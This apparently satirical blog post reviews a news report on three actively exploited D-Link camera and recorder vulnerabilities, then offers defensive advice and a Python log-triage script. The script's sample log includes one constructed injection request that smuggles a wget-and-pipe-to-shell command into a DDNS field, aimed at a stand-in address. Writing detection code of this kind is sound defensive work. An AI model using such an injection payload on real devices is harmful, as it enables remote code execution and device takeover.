Thursday, August 14, 2025

These D‑Link Devices Are Compromised — Replace Them Now

Hello everyone. Let’s scrub in and talk about a write-up that tries to warn you about active exploitation against aging D-Link gear, then occasionally drops the scalpel mid-surgery. The piece delivers the essentials — CISA has added three older D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog — but it also stumbles with vague phrasing, thin context, and a correction that shouldn’t have been necessary in the first place. Think of it as a patch note that tells you the boss got buffed, but forgets to explain the new mechanics.

What the article actually says

Quick summary

– CISA added three old, high-severity D-Link vulnerabilities to the KEV catalog due to evidence of active exploitation in the wild.

– These issues affect D-Link Wi‑Fi cameras (DCS‑2530L, DCS‑2670L) and a video recorder (DNR‑322L) — not routers, as the story clarifies in a post-publication correction.

– The vulnerabilities (from 2020 and 2022) include remote admin password disclosure, an authenticated command injection in cgi-bin/ddns_enc.cgi, and a download of code without integrity check on the DNR‑322L that can lead to OS-level command execution by an authenticated attacker.

– There are no details in the article about current exploitation techniques. It does note a December 2024 FBI advisory warning of scanning activity against webcams vulnerable to CVE‑2020‑25078.

– CVE‑2022‑40799 affects the DNR‑322L, which hit end‑of‑life in November 2021; users of that recorder are advised to discontinue and replace it. D‑Link provided fixes for the other two (camera) flaws in 2020.

– Federal Civilian Executive Branch agencies are required to mitigate by August 26, 2025.

CVE             Affected device(s)            CVSS  Issue summary
CVE-2020-25078  D-Link DCS-2530L, DCS-2670L   7.5   Unspecified flaw leading to remote administrator password disclosure
CVE-2020-25079  D-Link DCS-2530L, DCS-2670L   8.8   Authenticated command injection in cgi-bin/ddns_enc.cgi
CVE-2022-40799  D-Link DNR-322L               8.8   Download of code without integrity check enabling authenticated OS-level command execution

“Users still relying on DNR‑322L are advised to discontinue and replace them.”

The good: Clear triage, necessary alert

  • Signal over noise: It flags active exploitation and puts names to the patients — the specific D-Link camera models and the DNR-322L recorder — instead of hand-waving about “IoT gear.” That’s effective triage.
  • Severity and symptoms: The CVSS scores and descriptions aren’t buried. Remote admin password disclosure and authenticated command injection are not garden-variety coughs; they’re systemic risks.
  • Time-bound mitigation: A firm date for FCEB agencies (August 26, 2025) gives the piece operational weight. Deadlines focus the mind, like a timer ticking down in a raid.
  • Transparency via correction: The post-publication fix clarifying cameras/recorders (not routers) shows at least some willingness to stitch up a mistake rather than letting the wound fester.

The not-so-good: Vague incisions and missing aftercare

Now for the part where the attending physician raises an eyebrow. The article repeatedly gestures at critical details, then refuses to commit. “Evidence of active exploitation” is important, but readers get no anatomy of the attacks, no indicators, and no victim profile. It’s like telling the team the boss enrages at 40% and then refusing to explain the new phase.

  • Diagnostic ambiguity: The piece references vulnerabilities “from 2020 and 2022,” but only explicitly names CVE‑2020‑25078 and CVE‑2022‑40799. The mapping between the bullet points and those IDs is left to reader inference, which is not ideal when precision matters.
  • Patch status handwave: We’re told “fixes for the other two flaws were [provided] by D‑Link in 2020,” which is useful, but links, version numbers, or update guidance are absent. That’s like prescribing antibiotics without dosage or duration.
  • Exploit specifics: “Actively scanning” is meaningful context, but the article doesn’t bridge it to current exploitation patterns beyond acknowledging that it’s happening. No IOCs, no network fingerprints, no telltale logs to watch — nothing to equip defenders beyond “be aware.”
  • Product confusion residue: The correction is appreciated, but leading with a router reference in the first place undermines confidence. If you confuse the organ you’re operating on, the malpractice board starts taking notes.
  • Mitigation for non-FCEB: The government deadline is clear, but the practical “what should everyone else do today?” is implied rather than stated. Owners of EoL gear get the hard stop (“discontinue and replace”), but camera owners with patches available need crisp next steps.

What readers can actually do right now

  • If you have a DNR‑322L: Treat it as EoL equipment. Discontinue and replace it. That’s the article’s clearest directive.
  • If you run DCS‑2530L or DCS‑2670L: Apply the vendor’s 2020 fixes referenced by the article and verify the installed firmware matches the latest available for your model. For the DCS‑2530L, the NVD description of both camera CVEs gives the affected range as firmware before 1.06.01 Hotfix, so anything older is still exposed. Then change the admin password: the password‑disclosure flaw means credentials set while the device was unpatched may already have been harvested.
  • Assume exposure: CISA adds entries to KEV only on evidence of exploitation, so treat any internet‑reachable unit as potentially already compromised. Put these devices on their own segment, remove port forwards and UPnP mappings, disable remote access if it is not strictly required, and watch the logs for requests to cgi-bin/ddns_enc.cgi from addresses that have no business talking to a camera. Yes, it’s the “wipe, reimage, re‑equip” of the IoT world.
  • Plan your upgrade path: For any model approaching or at EoL, replacement is the only sustainable cure. You can’t heal a patient the hospital has discharged permanently.
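Since the article hands out no indicators, here is a small triage script of my own (added here; not code from the article, from CISA, or from D‑Link) that turns the “monitor for abnormal behavior” step into something you can actually run against device access logs. It flags requests to cgi-bin/ddns_enc.cgi (the one endpoint the write-up names), shell metacharacters inside that request’s query parameters, and requests that arrive from outside a management subnet. The combined-style log format, the 192.168.1.0/24 management network and the sample log lines are all constructed assumptions, not real traffic; adapt them to what your reverse proxy or syslog collector records.

```python
"""Triage access logs from the D-Link cameras/recorder discussed above.

Flags (a) requests to cgi-bin/ddns_enc.cgi, the command-injection target the
write-up names, (b) shell metacharacters in that request's query parameters,
and (c) requests arriving from outside the management network, meaning the
device is still reachable remotely despite the advice above.
"""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# The only endpoint the write-up names; extend this from your own inventory.
WATCHED_PATHS = {"/cgi-bin/ddns_enc.cgi"}

# A DDNS hostname or account field has no business containing these, but a
# shell interprets every one of them.
SHELL_META = re.compile(r"[;|&`$\n]")

# ASSUMPTION: the camera VLAN. Only addresses inside these networks should be
# talking to the devices; anything else counts as remote access.
MGMT_NETS = [ip_network("192.168.1.0/24")]

# ASSUMPTION: Apache/nginx "combined"-style lines. The native D-Link log
# format is not documented on the page; adjust the regex to your collector.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Return a dict with ip, ts, method, path, params, status, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs percent-decodes, so %3B is already ';' when we inspect it.
    rec["params"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def outside_mgmt(ip_text):
    """True when the source address is not inside any management network."""
    addr = ip_address(ip_text)  # raises ValueError on garbage
    return not any(addr in net for net in MGMT_NETS)


def triage_line(line):
    """Return the list of finding tags for one log line (empty = benign)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparsed"]
    findings = []
    if rec["path"] in WATCHED_PATHS:
        findings.append("watched-path")
        for name, values in rec["params"].items():
            if any(SHELL_META.search(v) for v in values):
                findings.append(f"shell-metachar:{name}")
    try:
        if outside_mgmt(rec["ip"]):
            findings.append("outside-mgmt-net")
    except ValueError:
        findings.append("bad-source-ip")
    return findings


def triage_log(text):
    """Triage every non-empty line; return [(line, findings), ...] for hits."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        findings = triage_line(line)
        if findings:
            hits.append((line, findings))
    return hits


# CONSTRUCTED sample lines, not real traffic: a benign LAN status call, an
# injection attempt from outside the management network, and an unrelated
# image fetch that should produce no finding.
SAMPLE_LOG = """\
192.168.1.20 - - [14/Aug/2025:09:01:11 +0000] "GET /cgi-bin/ddns_enc.cgi?action=status HTTP/1.1" 200 512
203.0.113.9 - - [14/Aug/2025:09:02:03 +0000] "GET /cgi-bin/ddns_enc.cgi?host=cam.example%3Bwget%20http%3A%2F%2F203.0.113.9%2Fx%7Csh HTTP/1.1" 200 90
192.168.1.30 - - [14/Aug/2025:09:03:30 +0000] "GET /image/jpeg.cgi HTTP/1.1" 200 40231
"""

if __name__ == "__main__":
    for line, findings in triage_log(SAMPLE_LOG):
        print(", ".join(findings), "<-", line)
```

A plain hit on the watched path from inside the management network is worth a look but is not by itself an attack; the combination of shell metacharacters in a DDNS field and a source outside the management network is the line you escalate on, and the same device should then be treated as compromised per the “assume exposure” bullet above.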

Style and substance: Does the reporting hold up?

The framing is timely and the intent is sound: highlight that old vulnerabilities in ubiquitous consumer gear are back in the spotlight because attackers didn’t stop poking at them. But the execution is uneven. The article gives you the boss name, health bar, and a rough idea of damage numbers; it withholds the move list, resistances, and loot table. For defenders, that’s not a full strat — it’s a teaser trailer.

As a clinician, I appreciate the high-level diagnosis. As an operator, I want the chart, labs, and the post-op instructions. Without those, the risk is that people skim “active exploitation,” nod gravely, and proceed with the same weekend plans, none the wiser about what to patch, isolate, or retire. The correction about routers adds a faint aftertaste of haste — the kind you get when a patch note ships five minutes before the servers go live.

Verdict

Overall impression: mixed. The article surfaces a necessary alert with concrete device names, CVSS context, an explicit government mitigation deadline, and a clear “discontinue and replace” call for DNR‑322L. That’s valuable. But it withholds too much practical detail, leans on vague exploitation references, and needed a correction on device types. Useful as a nudge, insufficient as a playbook. Treat it as your triage slip — then go get the surgical plan.

And that, ladies and gentlemen, is entirely my opinion.

Article source: CISA Adds 3 D-Link Router Flaws to KEV Catalog After Active Exploitation Reports, https://thehackernews.com/2025/08/cisa-adds-3-d-link-router-flaws-to-kev.html

Dr. Su
Dr. Su is a fictional character brought to life with a mix of quirky personality traits, inspired by a variety of people and wild ideas. The goal? To make news articles way more entertaining, with a dash of satire and a sprinkle of fun, all through the unique lens of Dr. Su.
